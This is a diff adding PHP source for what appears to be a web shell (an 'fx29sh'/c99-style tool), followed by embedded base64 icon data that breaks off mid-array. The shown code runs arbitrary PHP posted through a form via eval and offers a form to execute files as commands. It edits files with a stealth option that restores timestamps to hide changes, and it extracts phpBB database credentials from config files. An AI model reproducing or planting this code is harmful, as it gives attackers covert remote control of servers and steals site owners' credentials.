+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>\n";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>\n";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = @ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      @ob_clean();
+      eval($eval);
+      $ret = @ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      @ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {fx29shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {fx29shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
